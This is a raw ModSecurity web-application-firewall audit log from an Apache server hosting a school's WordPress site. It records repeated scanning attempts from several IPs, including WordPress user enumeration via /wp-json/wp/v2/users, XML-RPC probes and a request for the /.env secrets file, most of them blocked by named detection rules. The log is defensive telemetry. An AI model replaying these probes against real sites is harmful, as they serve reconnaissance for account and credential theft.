Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee458922-Z-- --4bef5e39-A-- [10/May/2025:04:19:31 +0700] aB5xY6uC4AqLGUOyzyX3LQAAAJQ 103.236.140.4 35374 103.236.140.4 8181 --4bef5e39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4bef5e39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4bef5e39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825571313523 3547 (- - -) Stopwatch2: 1746825571313523 3547; combined=1538, p1=542, p2=964, p3=0, p4=0, p5=32, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bef5e39-Z-- --07b0f467-A-- [10/May/2025:04:19:37 +0700] aB5xaci6w7GTj2w44Z6XhgAAAMk 103.236.140.4 35378 103.236.140.4 8181 --07b0f467-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.180 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --07b0f467-C-- demo.sayHello --07b0f467-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --07b0f467-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825577668687 5597 (- - -) Stopwatch2: 1746825577668687 5597; combined=4133, p1=557, p2=3337, p3=23, p4=27, p5=108, sr=111, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07b0f467-Z-- --6ef26958-A-- [10/May/2025:04:20:13 +0700] aB5xjdr9PbfRBMhzxmRU9QAAAEY 103.236.140.4 35382 103.236.140.4 8181 --6ef26958-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6ef26958-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ef26958-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825613248085 3591 (- - -) Stopwatch2: 1746825613248085 3591; combined=1597, p1=552, p2=1013, p3=0, p4=0, p5=32, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ef26958-Z-- --27670560-A-- [10/May/2025:04:20:19 +0700] aB5xk9r9PbfRBMhzxmRU9wAAAEg 103.236.140.4 35386 103.236.140.4 8181 --27670560-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.214 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --27670560-C-- demo.sayHello --27670560-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --27670560-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825619414709 5214 (- - -) Stopwatch2: 1746825619414709 5214; combined=4019, p1=522, p2=3278, p3=23, p4=26, p5=98, sr=108, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27670560-Z-- --5febcd4e-A-- [10/May/2025:04:21:14 +0700] aB5xytr9PbfRBMhzxmRU-QAAAEk 103.236.140.4 35390 103.236.140.4 8181 --5febcd4e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5febcd4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5febcd4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825674550627 3597 (- - -) Stopwatch2: 1746825674550627 3597; combined=1566, p1=556, p2=969, p3=0, p4=0, p5=40, sr=134, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5febcd4e-Z-- --a877fa5b-A-- [10/May/2025:04:21:15 +0700] aB5xy9r9PbfRBMhzxmRU-gAAAEw 103.236.140.4 35392 103.236.140.4 8181 --a877fa5b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a877fa5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a877fa5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825675675632 2175 (- - -) Stopwatch2: 1746825675675632 2175; combined=1043, p1=377, p2=640, p3=0, p4=0, p5=26, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a877fa5b-Z-- --18fadc60-A-- [10/May/2025:04:21:21 +0700] aB5x0dr9PbfRBMhzxmRU_QAAAE8 103.236.140.4 35398 103.236.140.4 8181 --18fadc60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.178 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --18fadc60-C-- demo.sayHello --18fadc60-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --18fadc60-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825681712311 6963 (- - -) Stopwatch2: 1746825681712311 6963; combined=4950, p1=640, p2=4050, p3=37, p4=42, p5=106, sr=121, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18fadc60-Z-- --cfff3930-A-- [10/May/2025:04:21:22 +0700] aB5x0quC4AqLGUOyzyX3LwAAAJY 103.236.140.4 35400 103.236.140.4 8181 --cfff3930-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.236 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cfff3930-C-- demo.sayHello --cfff3930-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfff3930-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825682298899 5088 (- - -) Stopwatch2: 1746825682298899 5088; combined=3889, p1=520, p2=3163, p3=22, p4=24, p5=93, sr=116, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfff3930-Z-- --449b1c1a-A-- [10/May/2025:04:21:23 +0700] aB5x09r9PbfRBMhzxmRU_gAAAFI 103.236.140.4 35402 103.236.140.4 8181 --449b1c1a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --449b1c1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --449b1c1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825683556270 2428 (- - -) Stopwatch2: 1746825683556270 2428; combined=1132, p1=387, p2=719, p3=0, p4=0, p5=26, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --449b1c1a-Z-- --f4466d68-A-- [10/May/2025:04:21:28 +0700] aB5x2Nr9PbfRBMhzxmRVAQAAAFQ 103.236.140.4 35410 103.236.140.4 8181 --f4466d68-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f4466d68-C-- demo.sayHello --f4466d68-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4466d68-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825688916448 4954 (- - -) Stopwatch2: 1746825688916448 4954; combined=3778, p1=481, p2=3084, p3=23, p4=26, p5=95, sr=110, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4466d68-Z-- --8cceaf65-A-- [10/May/2025:04:22:55 +0700] aB5yL9r9PbfRBMhzxmRVBgAAAEE 103.236.140.4 35422 103.236.140.4 8181 --8cceaf65-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.14.233.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.14.233.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8cceaf65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cceaf65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825775708392 3410 (- - -) Stopwatch2: 1746825775708392 3410; combined=1448, p1=461, p2=956, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cceaf65-Z-- --b2fbe275-A-- [10/May/2025:04:24:29 +0700] aB5yjauC4AqLGUOyzyX3MQAAAJg 103.236.140.4 35430 103.236.140.4 8181 --b2fbe275-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b2fbe275-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2fbe275-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825869983638 2857 (- - -) Stopwatch2: 1746825869983638 2857; combined=1548, p1=500, p2=1017, p3=0, p4=0, p5=31, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2fbe275-Z-- --39da9327-A-- [10/May/2025:04:24:36 +0700] aB5ylMi6w7GTj2w44Z6XhwAAAMg 103.236.140.4 35434 103.236.140.4 8181 --39da9327-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.76 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --39da9327-C-- demo.sayHello --39da9327-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --39da9327-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825876226117 6211 (- - -) Stopwatch2: 1746825876226117 6211; combined=4501, p1=604, p2=3640, p3=31, p4=35, p5=110, sr=114, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39da9327-Z-- --c87c9c24-A-- [10/May/2025:04:40:55 +0700] aB52Z9r9PbfRBMhzxmRVGgAAAE8 103.236.140.4 35512 103.236.140.4 8181 --c87c9c24-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.46.24.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.46.24.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c87c9c24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c87c9c24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746826855626382 2375 (- - -) Stopwatch2: 1746826855626382 2375; combined=1125, p1=351, p2=746, p3=0, p4=0, p5=27, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c87c9c24-Z-- --82834415-A-- [10/May/2025:04:44:48 +0700] aB53UNr9PbfRBMhzxmRVIAAAAFc 103.236.140.4 35560 103.236.140.4 8181 --82834415-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --82834415-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82834415-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746827088557636 3451 (- - -) Stopwatch2: 1746827088557636 3451; combined=1450, p1=472, p2=947, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82834415-Z-- --49999413-A-- [10/May/2025:04:44:53 +0700] aB53Vdr9PbfRBMhzxmRVIQAAAEA 103.236.140.4 35564 103.236.140.4 8181 --49999413-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.203 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --49999413-C-- demo.sayHello --49999413-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --49999413-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746827093748838 5516 (- - -) Stopwatch2: 1746827093748838 5516; combined=4084, p1=559, p2=3311, p3=29, p4=31, p5=91, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49999413-Z-- --e4e46a71-A-- [10/May/2025:04:50:31 +0700] aB54p8i6w7GTj2w44Z6XkQAAANc 103.236.140.4 35606 103.236.140.4 8181 --e4e46a71-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.183.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.183.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e4e46a71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4e46a71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746827431545307 743 (- - -) Stopwatch2: 1746827431545307 743; combined=315, p1=281, p2=0, p3=0, p4=0, p5=34, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
